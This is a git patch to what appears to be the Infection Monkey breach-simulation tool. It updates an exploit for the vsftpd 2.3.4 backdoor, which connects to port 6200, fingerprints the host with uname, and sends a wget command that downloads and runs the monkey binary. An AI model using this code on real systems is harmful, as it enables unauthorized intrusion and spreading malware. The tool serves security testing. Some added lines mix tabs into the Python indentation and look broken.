From bb8a1c5c017a7949148a661d9f6cef098aa3e0cb Mon Sep 17 00:00:00 2001
From: Dhayalan <coe13b006@iiitdm.ac.in>
Date: Tue, 12 Mar 2019 19:38:48 +0100
Subject: [PATCH] Updated the exploit.

The `.` was removed from reportpage.js and the exploit was modified.
---
 monkey/infection_monkey/exploit/vsftpd.py     | 44 ++++++++-----------
 .../cc/ui/src/components/pages/ReportPage.js  |  2 +-
 2 files changed, 20 insertions(+), 26 deletions(-)

diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
index 5819d7d44..86e64953a 100644
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@@ -1,17 +1,15 @@
-import logging
-from logging import getLogger
-
-import paramiko
 import StringIO
-import socket 
+import logging
+import paramiko
+import socket
 import time
-
+from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
 from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
 from infection_monkey.model import MONKEY_ARG
 from infection_monkey.network.tools import check_tcp_port
-from infection_monkey.exploit.tools import build_monkey_commandline
-from common.utils.exploit_enum import ExploitType
+from logging import getLogger
 
 LOG = getLogger(__name__)
 
@@ -23,7 +21,6 @@ USERNAME = b'USER letmein:)\n'
 PASSWORD = b'PASS please\n'
 
 
-
 class VSFTPDExploiter(HostExploiter):
     _TARGET_OS_TYPE = ['linux']
     
@@ -53,16 +50,7 @@ class VSFTPDExploiter(HostExploiter):
             backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             backdoor_socket.connect((self.host.ip_addr, 6200))
             LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
-            command = str.encode("uname -o" + '\n')
-            backdoor_socket.send(command)
-            response = backdoor_socket.recv(1024).decode('utf-8')
-            LOG.info('[+] Response for uname -o: %s', response)
-            if 'linux' in response.lower().strip():
-                #command execution is successful
-                self.host.os['type'] = 'linux'
-            else :
-                LOG.info("Port 6200 opened but failed to execute commands on victim %r ",self.host)
-
+            
             command = str.encode("uname -m" + '\n')
             backdoor_socket.send(command)
             response = backdoor_socket.recv(1024).decode('utf-8')
@@ -70,10 +58,13 @@ class VSFTPDExploiter(HostExploiter):
             if '' != response.lower().strip():
                 #command execution is successful
                 self.host.os['machine'] = response.lower().strip()
+                self.host.os['type'] = 'linux'
+
             else :
                 LOG.info("Failed to execute command uname -m on victim %r ",self.host)
 
             src_path = get_target_monkey(self.host)
+            LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
 
             if not src_path:
                 LOG.info("Can't find suitable monkey executable for host %r", self.host)
@@ -83,16 +74,19 @@ class VSFTPDExploiter(HostExploiter):
             LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
 
             #copy the monkey into the machine
-            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
+            http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
             dropper_target_path_linux = self._config.dropper_target_path_linux
+            LOG.info("Download link for monkey is %s",http_path)    
 
             #download the monkey
             download_command = '/usr/bin/wget %s -O %s;' %  (
-                    http_path, dropper_target_path_linux)
+                http_path, dropper_target_path_linux)
             LOG.info("Download_command is %s",download_command)            
             
             command = str.encode(str(download_command) + '\n')
-            backdoor_socket.send(command)
+	    backdoor_socket.send(command)
+	    time.sleep(3) # wait till the file is downloaded	
+	    LOG.info("waiting 3 seconds for download to be completed")       
 
             #changeit to executable
             
@@ -108,13 +102,13 @@ class VSFTPDExploiter(HostExploiter):
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
             cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
             cmdline += "&"
-            
-	        command = str.encode(str(cmdline) + '\n')
+	    	
+            command = str.encode(str(cmdline) + '\n')
             backdoor_socket.send(command)
+	    
             LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                      self._config.dropper_target_path_linux, self.host, cmdline)
             
-            backdoor_socket.close()
             self._exploit_info['Vulnerability'] = {"Success":"True"}
                      
         except Exception:
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
index 556fbd1a5..7dae3f2ed 100644
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@@ -302,7 +302,7 @@ class ReportPageComponent extends AuthComponent {
                 className="label label-warning">
                     {this.state.report.overview.issues.filter(function (x) {
                       return x === true;
-                    }).length} threats.</span>:
+                    }).length} threats</span>:
                 <ul>
                   {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
                     <li>Stolen SSH keys are used to exploit other machines.</li> : null }